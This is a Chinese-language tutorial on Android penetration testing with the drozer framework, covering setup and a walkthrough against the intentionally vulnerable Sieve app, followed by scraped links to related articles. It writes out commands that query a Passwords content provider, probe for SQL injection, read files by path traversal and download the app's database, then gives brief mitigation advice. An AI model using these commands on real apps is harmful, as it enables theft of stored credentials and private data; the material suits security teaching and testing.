x01 准备工作

测试环境:

1) 手机root权限

2) Adb.exe

3) 手机usb连接开启debug模式(在设置>关于手机>连续点击多次版本号,即可开启开发者模式)

4) Window下安装drozer

5) 安装完drozer后在其目录下把agent.apk安装到手机

6) WebContentResolver.apk

7) 附带测试案例使用app sieve

0x02 drozer安装与使用

安装

1) windows安装
下载:

https://www.mwrinfosecurity.com/products/drozer/community-edition/

在Android设备中安装agent.apk:

1

>adb install agent.apk

或者直接连接USB把文件移动到内存卡中安装

2) *inux安装(Debian/Mac)

1

2

3

4

5

6

$ wget http://pypi.python.org/packages/2.7/s/setuptools/setuptools-0.6c11-py2.7.egg

$ sh setuptools-0.6c11-py2.7.egg

$ easy_install --allow-hosts pypi.python.org protobuf

$ easy_install twisted==10.2.0

$ easy_install twisted ./drozer-2.3.0-py2.7.egg

$ drozer        //运行测试

下面介绍三种方法运行

1) USB方式

1

2

3

>adb forward tcp:31415 tcp:31415        //adb目录下运行次命令

选择drozer>Embedded Server>Enabled

>drozer.bat console connect     //在PC端drozer目录下运行此命令

2) Wifi方式

1

>drozer.bat console connect --server 192.168.1.12:31415  //在PC端执行192.168.1.12为android端ip和端口

3) Infrastructure Mode 这种模式涉及到三个通信方,drozer server、drozer agent(Android 设备中)与drozer console。

其中server与agent,server与console需要网络互通。这种模式的好处是你不需要知道android设备的ip,

agent与console的ip段可以隔离的,并且可以支持一个server对应多个设备的操作。

1

>drozer.bat server start

在Android设备上新建一个New Endpoint,修改配置Host为PC server端ip,并且启用Endpoint

1

>drozer console connect --server 192.168.1.2:31415      //192.168.1.2为server端ip和端口

使用

> list //列出目前可用的模块,也可以使用ls

> help app.activity.forintent //查看指定模块的帮助信息

> run app.package.list //列出android设备中安装的app

> run app.package.info -a com.android.browser //查看指定app的基本信息

> run app.activity.info -a com.android.browser //列出app中的activity组件

> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com //开启一个activity,例如运行浏览器打开谷歌页面

> run scanner.provider.finduris -a com.sina.weibo //查找可以读取的Content Provider

> run app.provider.query content://settings/secure --selection "name='adb_enabled'" //读取指定Content Provider内容

> run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo //列出指定文件路径里全局可写/可读的文件

> run shell.start //shell操作

> run tools.setup.busybox //安装busybox

> list auxiliary //通过web的方式查看content provider组件的相关内容

> help auxiliary.webcontentresolver //webcontentresolver帮助

> run auxiliary.webcontentresolver //执行在浏览器中以http://localhost:8080即可访问

以sieve示例

> run app.package.list -f sieve //查找sieve应用程序

> run app.package.info -a com.mwr.example.sieve //显示app.package.info命令包的基本信息

> run app.package.attacksurface com.mwr.example.sieve //确定攻击面

> run app.activity.info -a com.mwr.example.sieve //获取activity信息

> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList //启动pwlist

> run app.provider.info -a com.mwr.example.sieve //提供商信息

> run scanner.provider.finduris -a com.mwr.example.sieve //扫描所有能访问地址

>run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/--vertical //查看DBContentProvider/Passwords这条可执行地址

> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'" //检测注入

> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts //查看读权限数据

> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据

> run scanner.provider.injection -a com.mwr.example.sieve //扫描注入地址

> run scanner.provider.traversal -a com.mwr.example.sieve

> run app.service.info -a com.mwr.example.sieve //查看服务

0x03 Android App Injection

1) 首先用drozer扫描Android应用可注入的Url

1

Dz > run scanner.provider.injection

2) 启动WebContentResolver.apk应用程序,Web界面访问url格式如下

http://localhost:8080/query?a=providers&path0=Parameter1&path1=Parameter2&pathn=parametern&selName=column&selId=id

解释: providers:为content://后第一个参数比如records Parameter1:为第二个参数operations Parameter2..parametern:为后门的依次类推的参数,如果后面有这么多参数 Column:表字段例如上面字段<_id> Id:为字段数据

注意:格式必须是这样,selName、selId这两个参数第二个单词是大写的。

3) 在PC端运行adb

1

>adb forward tcp:8080 tcp:8080  //此时在地址栏输入http://localhost:8080即可访问Web界面

4) 以content://settings/bookmarks/为例,在地址栏输入

http://localhost:8080/query?a=settings&path0=bookmarks&selName=_id&selId=1

5) 自动化结合SQLMAP

0x04 总结&&解决方案

总结:虽然很多小伙说直接用文件管理进去查看数据库更方便,我也不多说什么,就像上次看到一帖子为了查看wifi密码写了一大篇的,直接进去数据库看不就是了,我能呵呵一句么。
避免这个漏洞方法只需要指定标志读取权限和限制写入权限。如果我们不想共享存储第三方应用程序记录,另一个解决方案可以消除provider或将其设置为false。

0x05 参考:

  • https://labs.mwrinfosecurity.com/blog/2011/12/02/how-to-find-android-0day-in-no-time/

Android App 注射&&Drozer Use的更多相关文章

  1. Android App渗透测试工具drozer,Qark,Androguard

    一. drozer简介 drozer(以前称为Mercury)是一款Android安全测试框架. drozer允许您通过承担应用程序的角色并与Dalvik VM,其他应用程序的IPC端点和底层操作系统 ...

  2. 【转载】Android app 安全测试调研及执行

    本文来源于:http://testerhome.com/topics/2209 一.通过在线工具进行测试 1.腾讯金刚审计系统http://service.security.tencent.com 优 ...

  3. android app性能优化大汇总

    这里根据网络上各位大神已经总结的知识内容做一个大汇总,作为记录,方便后续“温故知新”. 性能指标: (1)使用流畅度:  图片处理器每秒刷新的帧数(FPS),可用来指示页面是否平滑的渲染.高的帧率可以 ...

  4. Android App渗透测试工具汇总

    网上搜集了一些App安全学习教程及工具,项目地址:https://github.com/Brucetg/App_Security 一. drozer简介 drozer(以前称为Mercury)是一款A ...

  5. Android App安全渗透测试(一)

    一.            实验环境搭建 1.      安装JDK 2.      安装Android Studio 3.      模拟器或真机 我的是夜神模拟器和nexus 工具 Apktool ...

  6. Android Studio配置 AndroidAnnotations——Hi_博客 Android App 开发笔记

    以前用Eclicps 用习惯了现在 想学学 用Android Studio 两天的钻研终于 在我电脑上装了一个Android Studio 并完成了AndroidAnnotations 的配置. An ...

  7. Livecoding.tv 现正举行iOS及Android App设计比赛

    近日,Livecoding.tv, 一个为世界各地的程序员提供在线实时交流的平台,在其网站上发布了一篇通知, 宣布从4月15日至5月15日,会为iOS和Android的开发者举办一场本地移动app设计 ...

  8. Android APP 简单高效的禁用横竖屏切换

    默认情况下,Android APP的界面会随着手机方向的改变而改变,当手机处于竖屏状态,APP的界面也处于竖屏状态,而当手机处于横屏状态,APP也会自动切换到横屏状态.一般情况下APP的界面都是为竖屏 ...

  9. Android App的设计架构:MVC,MVP,MVVM与架构经验谈

    相关:http://www.cnblogs.com/wytiger/p/5996876.html 和MVC框架模式一样,Model模型处理数据代码不变在Android的App开发中,很多人经常会头疼于 ...

随机推荐

  1. R语言变量赋值

    变量可以使用向左,向右且等于操作符来分配值.可以使用 print() 或 cat() 函数打印变量的值.cat() 函数将多个项目并成连续并打印输出. # Assignment using equal ...

  2. JAVA 方法 和Scanner

    方法:包含于类或对象中,是解决一类问题步骤的有序组合. 算法:解决一类问题的思想. Scanner next()与nextLine()区别 next(): 1.一定要读取到有效字符后才可以结束输入. ...

  3. iOS 自定义步骤进度条

    新项目要做入驻功能,其中包括一个入住流程,类似登录或者注册流程如下图. 之前想着用自己绘图来做,可是又懒不想多写代码,所以就想着能不能用进度条来做. 1.用进度条做的首先要解决的是进度条的高度问题,可 ...

  4. html制作chm格式开源文档

    在主界面点击生成器,找到网页所在的文件夹. 然后用编译,还是找到网页文件夹.根据需要设置.TOC 那一项是目录,请根据需要修改. 特别要注意的是,预设那里,点击那个配置图标,会打开如下图的预设编辑器. ...

  5. 初识JSP,第一天

    1.什么JSP java Server Page java 服务端的页面,它和servlet 一样可以提供动态的html 响应. 不同的是 servlet 以 java 代码 为主 jsp 以html ...

  6. redis的默认配置文件redis.conf详解

    # redis 配置文件示例 # 当你需要为某个配置项指定内存大小的时候,必须要带上单位, # 通常的格式就是 1k 5gb 4m 等酱紫: # # 1k => 1000 bytes # 1kb ...

  7. HDU 1575 Tr A----矩阵相乘题。

    Tr A Time Limit: 1000/1000 MS (Java/Others)    Memory Limit: 32768/32768 K (Java/Others) Total Submi ...

  8. 基于.Net下整合RestSharp,实现REST服务客户端

    一. 准备工作 1. 点击此访问 RestSharp 官网,可作参考 2. VS2012 中安装支持.Net4.0的最新版 RestSharp 插件 工具---NuGet程序包管理器---程序包管理器 ...

  9. MySQL并发控制

    并发即指在同一时刻,多个操作并行执行.MySQL对并发的处理主要应用了两种机制——是“锁”和“多版本控制”. 锁 锁分为读锁和写锁两种,也称作共享锁和排他锁.因为多个读操作同时进行是不会破坏数据的,所 ...

  10. POJ P2318 TOYS与POJ P1269 Intersecting Lines——计算几何入门题两道

    rt,计算几何入门: TOYS Calculate the number of toys that land in each bin of a partitioned toy box. Mom and ...